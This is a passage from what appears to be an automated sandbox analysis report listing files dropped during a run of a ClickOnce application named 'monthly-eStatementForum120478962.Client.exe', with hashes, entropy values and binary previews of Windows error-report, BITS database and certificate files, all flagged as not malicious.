                                                                                                                                                                                                                                                  Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x25e71e2a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                  Entropy (8bit):0.6585765152302204
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:hSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:haza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                                  MD5:D57F42B976D10AEB1ABF3BBBC0D8700A
                                                                                                                                                                                                                                                  SHA1:1A2BF2C22E35370FBBCFA2A110340248CD059E00
                                                                                                                                                                                                                                                  SHA-256:E288F2805894ECE8B3A937252801DF46D82BAA12250D1E90D5F52852F6CDA779
                                                                                                                                                                                                                                                  SHA-512:92F344960C1FE434ACE524707A538D427FCFDDA7A486336F7D64C5F3DE2A81E761779B9A9E971CC1ACBA23FB45AA051EAC417EAE2E2E1A3A78FD3C863ED179C8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:%..*... ...............X\...;...{......................0.z..........{.......|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{...........................................|/.................s.R......|/..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                  Entropy (8bit):0.08036169633905144
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:YKl/llKYeRmXHbGuAJkhvekl1onQKFlAllrekGltll/SPj:Y+//KzRabrxlOn3AJe3l
                                                                                                                                                                                                                                                  MD5:D658B17990F495395F83C0EA70935543
                                                                                                                                                                                                                                                  SHA1:8E97C946D1606973C727274B248FE1A2047261D4
                                                                                                                                                                                                                                                  SHA-256:1E99849F6A259CFBF0797BAD63E47613480C68230913F31C563400BC2995DF0E
                                                                                                                                                                                                                                                  SHA-512:60E4B82206803DE9EE29FDDC641E711E00BE0919D0E0335E5EF70C09DACEAEFB71B53B1140E4E5BA29E07095CBB0165A06ECBE3D3C11FE84D4FB242BD5788D05
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.gx......................................;...{.......|/......{...............{.......{...XL......{..................s.R......|/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                                  Entropy (8bit):0.9422405274480878
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:XHFWgVQMQLs6fhqvGXyf5QXIDcQvc6QcEVcw3cE/XhB+HbHg/Jg+OgBCXEYcI+10:XkLIy0BU/wjq0ozuiFFZ24IO8T
                                                                                                                                                                                                                                                  MD5:E99F8D3D9BAD565542EACB359EB10414
                                                                                                                                                                                                                                                  SHA1:6FDCBC34D4F03435EB3061D6CCDD0B25E97597EB
                                                                                                                                                                                                                                                  SHA-256:70931154134CAD55AEA0AB0D8FDF7AD4EE68D4F2CDC9AC9FCC498DCC84079D0D
                                                                                                                                                                                                                                                  SHA-512:45D9DF6C7B9F16BC776123E1530FD4530DFA481E785ADF96BDA1121357B862CB6CF868788208207F264EBBEFE53910615731FDE079C14588B0D0CE6DFFE09A50
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.5.3.3.6.6.3.4.0.0.2.2.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.5.3.3.6.6.3.9.3.1.4.7.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.7.3.6.7.0.f.-.a.7.7.a.-.4.7.b.b.-.a.4.5.3.-.d.c.4.0.3.b.5.7.c.0.6.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.f.2.f.8.1.a.-.8.5.e.e.-.4.f.2.a.-.8.0.c.e.-.8.9.d.0.4.6.4.1.2.7.1.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.o.n.t.h.l.y.-.e.S.t.a.t.e.m.e.n.t.F.o.r.u.m.1.2.0.4.7.8.9.6.2...C.l.i.e.n.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.d.4.-.0.0.0.1.-.0.0.1.4.-.e.4.8.2.-.c.7.1.c.c.5.3.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.2.5.3.e.d.2.8.1.b.3.2.6.b.1.a.6.8.6.a.4.9.5.f.e.9.6.d.0.a.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.e.b.9.6.5.6.e.d.e.1.f.e.d.2.3.f.d.a.e.b.6.7.8.1.5.a.f.c.d.4.8.9.d.e.d.0.
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Fri Nov 8 10:01:03 2024, 0x1205a4 type
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):83910
                                                                                                                                                                                                                                                  Entropy (8bit):1.6442408006053106
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:KA7tRlX7jamOhI/DgtqBfMuMM96abQMnev4o/bfW8vOhVoOIbpfiy1kP:fJRYxhI/ktir9L8K6OhVQKy1k
                                                                                                                                                                                                                                                  MD5:7C2967B17975CB35DEABC1C6778B0E72
                                                                                                                                                                                                                                                  SHA1:8DFD26993B42DD1C81636ADC47E35BB7976BBC52
                                                                                                                                                                                                                                                  SHA-256:6AFBA391FF38C9D8535DD446691520D161CBF8CF175074D7D20CDD2AAA4C0E33
                                                                                                                                                                                                                                                  SHA-512:7E284F2CFDED63DD70BF6786EF8DABFF9851D7164333022902D06EA54D1937828F3DC29143946FF1B0F29DC00AC92F62DA8336918C76EE9FE466EA19582BFBD3
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:MDMP..a..... ......._.-g.........................................<..........T.......8...........T............!..F&.......... ...........................................................................................eJ..............GenuineIntel............T...........[.-g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):8450
                                                                                                                                                                                                                                                  Entropy (8bit):3.696105525464364
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJuV6C6YEIaSU9SggmfwWmprN89bNbsfgvm:R6lXJc6C6YE1SU9SggmfwWRNgf1
                                                                                                                                                                                                                                                  MD5:7045D9D0C4661CF5FDD85564FE308525
                                                                                                                                                                                                                                                  SHA1:8319CC854135F348D20CD8F27A36DDBC26A00CA9
                                                                                                                                                                                                                                                  SHA-256:03BCDEE5BEDF876E7C14C92F054D23B293F513889D2523BADC17E1FDFBB40412
                                                                                                                                                                                                                                                  SHA-512:2117F10A175A4C6B49FFEA78C634013D5D36D23A4AE712AB66FEFAD24F464305CDFEC587C4AC7BE883C34AE0BD4FD8B6F553C87C0AEA349CB6EC6834C6ED0D60
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.6.0.<./.P.i.
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4738
                                                                                                                                                                                                                                                  Entropy (8bit):4.525926181500605
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zsgJg77aI9p2WpW8VY+Ym8M4JHAxArEFD+q80AXhupqwzAFXAF3d:uIjfmI7TX7VCJamup1qO3d
                                                                                                                                                                                                                                                  MD5:D7625E95D90263B689F13E1FD154E741
                                                                                                                                                                                                                                                  SHA1:D34C6DD5EBFC102B1AADB3829E2DDB6E25C09D44
                                                                                                                                                                                                                                                  SHA-256:BA2682C11920D166E582618FF357ED17A92384A40EC906A5E4C663512DC05673
                                                                                                                                                                                                                                                  SHA-512:C26D6F596984469A02B3140ED00BF755F57C8E0ED149BB0C2565D664DA61501DBCA6ED35A4427755FA77320DD06849A67E86FD477C6A4DD3E72EAAE917DCE6C6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="578943" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):78990
                                                                                                                                                                                                                                                  Entropy (8bit):3.066430991149799
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:aN2Wum9rlzqxRjibC0rt3LTzFHmaYfMf7571w:aN2Wum9rlzqxRjibC0rt3LTzFHmaYfMk
                                                                                                                                                                                                                                                  MD5:2871A127EEBF25011D973A1949D5CCD7
                                                                                                                                                                                                                                                  SHA1:209B318752B79D6923449E5B592D494F6FA5238D
                                                                                                                                                                                                                                                  SHA-256:EB2CB398D493F35E6953B06B49534925A82F181E72E3C77E2D6A03D4E9AD0271
                                                                                                                                                                                                                                                  SHA-512:3FD6804C2947A314DAFA9D3A3083704BDE518FB6A9C4E2D753BDF16246CF2D081A88D95CEAF7C3FC5875666BE90B3792554D102956D3C8D1437DD649CF8F38C0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13340
                                                                                                                                                                                                                                                  Entropy (8bit):2.6837838614035
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:TiZYWVU/LC+0SHYoYZqWIjuHFYEZ6wt8iwL8tjwWJ6A2a/OvHMMpa3IEL3:2ZDV+P/jjAca/OEMpaYEL3
                                                                                                                                                                                                                                                  MD5:7DD783698A3DD919D2BF1F600A15C45B
                                                                                                                                                                                                                                                  SHA1:B3FD6D7DAE5EDF83F5EC3EEBDC3B84EA6305119D
                                                                                                                                                                                                                                                  SHA-256:125A90F3E1E4046AC09E070CE5D12EEDD7A5567D9CA03619B1B58FA7D9471667
                                                                                                                                                                                                                                                  SHA-512:D825A4FED48CBC3C7B0AAD2BDFC45319AB57C3FD463196E890D8438F2AD7B596CE678BEE642E4797B8AF1815C9C186B47EED8DEDEB68A2CC3B27458BF1FCDF3F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4770
                                                                                                                                                                                                                                                  Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                                  MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                                  SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                                  SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                                  SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):71954
                                                                                                                                                                                                                                                  Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:Certificate, Version=3
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1716
                                                                                                                                                                                                                                                  Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                  MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                  SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                  SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                  SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):727
                                                                                                                                                                                                                                                  Entropy (8bit):7.562070540258883
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:5onfZSc5RlRtBfQwRhs5vCZgPVrVJEYbw7OIiVFQlb8PjcNCUAnqr/E:5i8cdZTRhG+gPZPfIgMb8PjcNCa/E
                                                                                                                                                                                                                                                  MD5:EB9A1D98CC4B6AC3D674A6621DF5A758
                                                                                                                                                                                                                                                  SHA1:5E9BC182D48B8E86A61D8A3F4B5ADD9C88DA6800
                                                                                                                                                                                                                                                  SHA-256:20D856D68DBA3E2246EBB62A5EAEDCEFDA221ACCFA1B9362B33AFAD33B6E48C7
                                                                                                                                                                                                                                                  SHA-512:1054D82E5E1B2F2C1416D31F01FF2C172ACA8DCC31A622CDD959F918B78A474BD9B40A9B7316122A8262FAC24D6236860E2EADD665030A61D56C5C0A153F81C7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241107184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241107184215Z....20241114184215Z0...*.H.............t.yl..<Y.&4S...*..).G...s.X.S.x....)l.ng.Jpe....-...}@....|.....J.\#(....]..}.......k/.a..v.I.w...6.W.`{.D..z.%.c.T".p....\....CX..L...u.n...6t.6..1W....f....m6.W....?..N...d.Q..1...H+..k..A.X..../&a.I....#..)..h.*.'..@...'s.~.i.X"...w.B...P\.K..3..V.5...A.-l..#.V...i...\.)=..G.ob....o............eTi.1...)k..+.e.?. :.X.0^.k.4.;.....S8....\.K.w#q..._m.F....(^.......}.\.}?...W....T.......)..#..{6QC...'....=....f.....>........{}.k..\...*.i.....e..F..1&.%.U.aAO....k....<....p?S.
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:Certificate, Version=3
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1428
                                                                                                                                                                                                                                                  Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                  MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                  SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                  SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                  SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                  Malicious:false
